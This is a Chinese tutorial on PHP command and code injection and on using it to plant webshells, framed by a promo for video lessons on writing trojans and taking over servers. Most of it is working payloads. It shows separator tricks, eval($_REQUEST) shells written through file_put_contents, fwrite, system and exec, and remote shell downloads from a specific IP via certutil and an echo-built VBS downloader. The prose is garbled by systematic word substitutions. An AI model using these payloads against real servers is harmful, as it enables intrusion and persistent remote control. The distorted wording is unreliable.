本文由团队手电筒分享,如果你还是个小白担心看不懂,没紧要,“三步写马””如何上传木马”“如何拿下做事器并妥善管理”等实战内容可以结合视频不雅观看,视频演示先从事理,再到实操演示,一步步清晰明了,更易接管,视频私信我
PHP一.命令实行命令实行(注入)常见可控位置情形有下面几种:
system("$arg"); //可控点直接是待实行的程序
如果我们能直接掌握$arg,那么就能实行实行任意命令了。
system("/bin/prog $arg"); //可控点是传入程序的全体参数
我们能够掌握的点是程序的全体参数,我们可以直接用&& || 或 | 等等,利用与、或、管道命令来实行其他命令(可以涉及到很多linux命令行技巧)。
system("/bin/prog -p $arg"); //可控点是传入程序的某个参数的值(无引号包裹)
我们掌握的点是一个参数,我们也同样可以利用与、或、管道来实行其他命令,情境与二无异。
system("/bin/prog -p=\"$arg\"");//可控点是传入程序的某个参数的值(有双引号包裹)
这种情形压力大一点,有双引号包裹。
如果引号没有被转义,我们可以先闭合引号,成为第三种情形后按照第三种情形来利用,如果引号被转义(addslashes)、我们也不必焦急。
linux shell 环境下双引号中间的变量也是可以被解析的,我们可以在双引号内利用反引号实行任意命令 id
system("/bin/prog --p='$arg'"); //可控点是传入程序的某个参数的值(有单引号包裹)
这是最困难的一种情形
由于单引号内只是一个字符串,我们要先闭合单引号才可以实行命令。
如:system(“/bin/prog –p=’aaa’ | id”)
在漏洞检测中,除了有回显的命令
还可以利用盲打的办法,比如curl远程机器的某个目录(看access.log),或者通过dns解析的办法获取到漏洞机器发出的要求。
当我们确定了OS命令注入漏洞后,常日可以实行一些初始命令来获取有关受到毁坏的系统的信息。
以下是在Linux和Windows平台上常用的一些命令的择要:
命令目的
linux
windows
当前用户名
whoami
whoami
操作系统
uname -a
ver
网络配置
ifconfig
ipconfig /all
网络连接
netstat -an
netstat -an
运行进程
ps -ef
tasklist
命令分隔符
在Linux上, ; 可以用 |、|| 代替
;前面的实行完实行后面的|是管道符,显示后面的实行结果||当前面的实行出错时实行后面的可用%0A和 \n换行实行命令
在Windows上,不能用 ; 可以用&、&&、|、||代替
&前面的语句为假则直接实行后面的&&前面的语句为假则直接出错,后面的也不实行|直接实行后面的语句||前面出错实行后面的
PHP 支持一个实行运算符:反引号(``) PHP 将考试测验将反引号中的内容作为 shell 命令来实行,并将其输出信息返回
<?php echo `whoami`;?>
效果与函数 shell_exec() 相同,都因此字符串的形式返回一个命令的实行结果,可以保存到变量中
二.代码实行
此处以php为例,其它措辞也存在这类利用。
(1) preg_replace()函数:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit =-1[,int&$count ]])
当$pattern处存在e润色符时,$replacement 会被当做php代码实行。
(2)mixed call_user_func( callable $callbank [ , mixed $parameter [ , mixed
$…):
第一个参数为回调函数,第二个参数是回调函数的参数
(3)eval()和assert():
当assert()的参数为字符串时 可实行PHP代码
【区分】:
eval(" phpinfo(); ");【√】eval(" phpinfo() ");【X】assert(" phpinfo(); ");【√】assert(" phpinfo() ");【√】
三.反序列化
php反序列化导致RCE的事理及利用,参考专题文章:
文库 | 反序列化漏洞汇总
四.通过代码实行或命令实行写shell
代码实行写shell
当碰着一个可以代码实行的位置时,我们可以通过写webshell来进行进一步渗透
1.file_put_contents函数
file_put_contents函数格式为file_put_contents(filename,data)
指定写入文件名和写入文件的数据可以通过这个函数去写入数据
这里用了网上的漏洞测试的平台
测试语句为:
file_put_contents('gt.php','<?php eval($_REQUEST[5]);?>');
访问文件
2.fopen() 创建文件函数
fopen函数,格式为fopen(filename,mode) 前面是文件名,后面是规定哀求到该文件/流的访问类型
它的浸染是打开文件或url,这里当后续命令为w,或W+ 时,当文件不存在的话就会新建一个文件然后再用fwrite去写入数据
fwrite()写入文件函数,格式为fwrite(file,string),这里file是文件名,string是写入的字符串
这里把稳如果是通过assert函数去代码实行,那么只许可一条语句去实行
这里可以把两个命令写一起例如
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');
实行效果如下实行语句
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');
访问文件
3.fputs函数
Fputs函数也是php里一个用于写入文件的函数,它实在是fwrite的别名基本用法和fwrite一样测试语句为
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');
实行语句
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');
访问文件
4.通过实行命令实行函数去写shell
通过代码实行漏洞去实行代码脚本调用操作系统命令常用函数有
system()
exec()
shell_exec()
passthru()
pcntl_exec()
popen()
proc_open()这里我们只挑选个中部分来测试,其他的道理差不多
4.1、首先为system()
测试语句为
system(' echo "<?php @eval($_REQUEST[8])?>" >pp.php ');
然后访问文件测试下
测试完成
4.2、exec()函数
测试语句如下
exec(' echo "<?php @eval($_REQUEST[8])?>" >ppl.php ');
在本地实行下
访问天生文件
4.3、shell_exec()函数
测试语句为
shell_exec(' echo "<?php @eval($_REQUEST[8])?>" >ppk.php ');
在本地实行测试
访问天生文件
4.4、passthru()函数
测试语句为
passthru(' echo "<?php @eval($_REQUEST[8])?>" >ppm.php ');
在本地测试
访问天生文件
命令实行写webshell
通过cmd命令去写入
通过cmd里的echo去写入webshell
命令如下
echo "<?php @eval($_REQUEST[8])?>">223.php
实行如下
返回页面如下
访问223.php
通过命令实行去远程下载shell
利用windows的certutil命令例:
certutil -urlcache -split -f http://129.211.169.121/123.php
通过windows的certutil去在外部下载文件这个certutil是windows系统上预装的工具,一样平常用于校验md5,sha1,sha256,下载文件
实行这个须要相称高的权限,
在搭建的做事器上安装好环境
在本地测试一下
实行命令
certutil -urlcache -split -f http://129.211.169.121/123.php
得到结果
得到返回文件
访问效果如下
通过vbs去建立脚本去下载
vbs是基于visual Basic的脚本措辞,一样平常windows设备自带
这里我们通过命令实行去写入脚本,然后再通过命令实行去下载shell
测试脚本如下
Set args =Wscript.ArgumentsUrl="http://129.211.169.121/1234.php"dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm:Set bStrm = createobject("Adodb.Stream")xHttp.Open"GET",Url,FalsexHttp.Sendwith bStrm.type =1.open.write xHttp.responseBody.savetofile "12345.php",2endwith
先再远程机器上设立一个php文件名为1234.php内容为
<?phpecho “<?php phpinfo();?>”;?>
为什么要这样写呢?
这个脚本是直接读取远程机器上的文件信息然后写入到一个文件里,我们通过读取这个php页面显示的语句去得到shell内容
然后我们在页面里去写入vbs文件,这里脚本内容过长,且有换行,我们通过echo 一条条写入命令,和前面命令实行写shell一样
echo Set args =Wscript.Arguments> xxx.vbsecho Url="http://129.211.169.121/1234.php">>xxx.vbsecho dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")>>xxx.vbsecho dim bStrm:Set bStrm = createobject("Adodb.Stream")>>xxx.vbsecho xHttp.Open"GET",Url,False>>xxx.vbsecho xHttp.Send>>xxx.vbsecho with bStrm >>xxx.vbsecho .type =1>>xxx.vbsecho .open >>xxx.vbsecho .write xHttp.responseBody >>xxx.vbsecho .savetofile "12345.php",2>>xxx.vbsecho endwith>>xxx.vbs
后续内容通过>> 换行写入
得到xxx.vbs文件
然后在存在命令实行处实行命令去下载文件
实行命令 start wscript -e:vbs xxx.vbs
然后得到文件
去访问
未完待续...
